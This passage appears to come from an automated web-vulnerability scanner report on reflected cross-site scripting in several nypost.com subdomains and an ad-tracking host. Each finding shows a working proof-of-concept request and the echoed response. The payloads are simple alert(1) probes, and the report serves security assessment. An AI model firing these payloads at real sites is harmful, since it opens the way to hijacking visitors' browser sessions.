jsonp129080571861560647<script>alert(1)</script>0bdac1d23ec({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"ae6dc541-95fd-4c05-a149-b5fe5b4b6039","persist":{"fvt":"1289172835","vn":3,"sst":1290802970,"spt":1290802970,"spd":1,"npv":6,"sur":""},"data":{}})
...[SNIP]...

1.114. http://rt.sitebrand.com/main.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9cd22<img%20src%3da%20onerror%3dalert(1)>b0820e9530 was submitted in the cid parameter. This input was echoed as 9cd22<img src=a onerror=alert(1)>b0820e9530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805718615&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce9cd22<img%20src%3da%20onerror%3dalert(1)>b0820e9530&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 263
Connection: keep-alive

jsonp1290805718615({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce9cd22<img src=a onerror=alert(1)>b0820e9530","sid":"70732e8e-f026-43df-8e51-821758492567","persist":{"fvt":"1289172835","vn":3,"sst":1290802991,"spt":1290802991,"spd":1,"npv":6,"sur":""},"data":{}})

1.115. http://rt.sitebrand.com/main.php [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the sid request parameter is copied into the HTML document as plain text between tags. The payload f3eea<img%20src%3da%20onerror%3dalert(1)>13fa3e6a01 was submitted in the sid parameter. This input was echoed as f3eea<img src=a onerror=alert(1)>13fa3e6a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805808871&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2Fhomedelivery%2Fsignup.htm&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=homedelivery1&sid=c17ed75e-d5a1-4ad1-a683-d7c3460dd23ff3eea<img%20src%3da%20onerror%3dalert(1)>13fa3e6a01&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=3&sst=1290802578&spt=1290802578&spd=1&npv=6&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/homedelivery/signup.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 267
Connection: keep-alive

jsonp1290805808871({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"c17ed75e-d5a1-4ad1-a683-d7c3460dd23ff3eea<img src=a onerror=alert(1)>13fa3e6a01","persist":{"fvt":"1289172835","vn":"3","sst":"1290802578","spt":1290802983,"spd":2,"npv":7,"sur":""},"data":{}})

1.116. http://rt.sitebrand.com/main.php [sur parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the sur request parameter is copied into the HTML document as plain text between tags. The payload 47524<img%20src%3da%20onerror%3dalert(1)>7c23df00654 was submitted in the sur parameter. This input was echoed as 47524<img src=a onerror=alert(1)>7c23df00654 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805808871&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2Fhomedelivery%2Fsignup.htm&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=homedelivery1&sid=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=3&sst=1290802578&spt=1290802578&spd=1&npv=6&sur=47524<img%20src%3da%20onerror%3dalert(1)>7c23df00654&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/homedelivery/signup.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 268
Connection: keep-alive

jsonp1290805808871({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"c17ed75e-d5a1-4ad1-a683-d7c3460dd23f","persist":{"fvt":"1289172835","vn":"3","sst":"1290802578","spt":1290803003,"spd":2,"npv":7,"sur":"47524<img src=a onerror=alert(1)>7c23df00654"},"data":{}})

1.117. http://rt.sitebrand.com/main.php [ur parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the ur request parameter is copied into the HTML document as plain text between tags. The payload 15bb2<img%20src%3da%20onerror%3dalert(1)>72efd0729ca was submitted in the ur parameter. This input was echoed as 15bb2<img src=a onerror=alert(1)>72efd0729ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805718615&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=15bb2<img%20src%3da%20onerror%3dalert(1)>72efd0729ca&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 264
Connection: keep-alive

jsonp1290805718615({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"a65a8069-a5d0-407c-95e3-779a21c1ef47","persist":{"fvt":"1289172835","vn":3,"sst":1290802981,"spt":1290802981,"spd":1,"npv":6,"sur":"15bb2<img src=a onerror=alert(1)>72efd0729ca"},"data":{}})

1.118. http://stats.nypost.com/cfb/scoreboards.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /cfb/scoreboards.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8145e"><script>alert(1)</script>2082e2a3405 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cfb/scoreboards.asp?8145e"><script>alert(1)</script>2082e2a3405=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=9
Date: Fri, 26 Nov 2010 20:24:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="60;URL=/cfb/scoreboard.asp?8145e"><script>alert(1)</script>2082e2a3405=1">
...[SNIP]...

1.119. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /fb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75afa"><script>alert(1)</script>d0a3c5ea0b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb/scoreboard.asp?75afa"><script>alert(1)</script>d0a3c5ea0b9=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/fb/scoreboard.asp?75afa"><script>alert(1)</script>d0a3c5ea0b9=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.120. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /mlb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f5ab"><script>alert(1)</script>526647f750e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mlb/scoreboard.asp?3f5ab"><script>alert(1)</script>526647f750e=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:54 GMT
Content-Length: 30704
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/mlb/scoreboard.asp?3f5ab"><script>alert(1)</script>526647f750e=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.121. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nba/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553e8"><script>alert(1)</script>c2e5b656e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nba/scoreboard.asp?553e8"><script>alert(1)</script>c2e5b656e86=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nba/scoreboard.asp?553e8"><script>alert(1)</script>c2e5b656e86=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.122. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nhl/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfd5"><script>alert(1)</script>3783214829f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nhl/scoreboard.asp?3bfd5"><script>alert(1)</script>3783214829f=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nhl/scoreboard.asp?3bfd5"><script>alert(1)</script>3783214829f=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.123. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fe6c"-alert(1)-"e45e0a85c9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seller9fe6c"-alert(1)-"e45e0a85c9d/1357873/ HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:27 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=e17d46f4cace52de2f1a7a154b5c560b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=17b1569672d8377c490c56bedaae484b; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1ENUM3OTU0NjRDRjAxNzdC; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "usa-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds seller9fe6c"-alert(1)-"e45e0a85c9d/1357873/","10000000","usa-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.124. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a8a"><script>alert(1)</script>0bc6ba7292 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /seller90a8a"><script>alert(1)</script>0bc6ba7292/1357873/ HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=6314450fea101b2308e655bdcc8c4b38; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ec0c13ddb0a6e63abdaf0ce42fe905ac; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1COUFFRTIwMDRDRjAxNzdB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/seller90a8a"><script>alert(1)</script>0bc6ba7292/1357873/" />
...[SNIP]...

1.125. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eae4f"-alert(1)-"6ea7d1d3e5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seller/1357873eae4f"-alert(1)-"6ea7d1d3e5a/ HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=698ca94c019131a34e7cc89d01cedc8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=24780bb1a0dc2a3d57753a934237e825; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FNEU4RkJGQTRDRjAxNzgw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA3Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_-seller-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "usa-_-seller-_-seller-_--_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("seller 1357873eae4f"-alert(1)-"6ea7d1d3e5a/","10000064","","","usa-_-seller-_-seller-_-nypost USA-_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.126. http://usa.classifieds.nypost.com/seller/1357873/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a75"-alert(1)-"24fbe44fe7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seller/1357873/?78a75"-alert(1)-"24fbe44fe7d=1 HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=2b2a1e79ed0636d22bed1acb464ba6e8; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ff824e33ae4b4bf1d16c43bab1fafcdd; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FNEQ3Qzk5QzRDRjAxNzc4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
seller-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "usa-_-seller-_-seller-_--_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("seller 1357873/?78a75"-alert(1)-"24fbe44fe7d=1","10000064","","","usa-_-seller-_-seller-_-nypost USA-_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.127. http://redcated/8GF/iview/273499083/direct/01/4055590 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c209'%3bd57c61ac63f was submitted in the REST URL parameter 4. This input was echoed as 4c209';d57c61ac63f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct4c209'%3bd57c61ac63f/01/4055590?click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
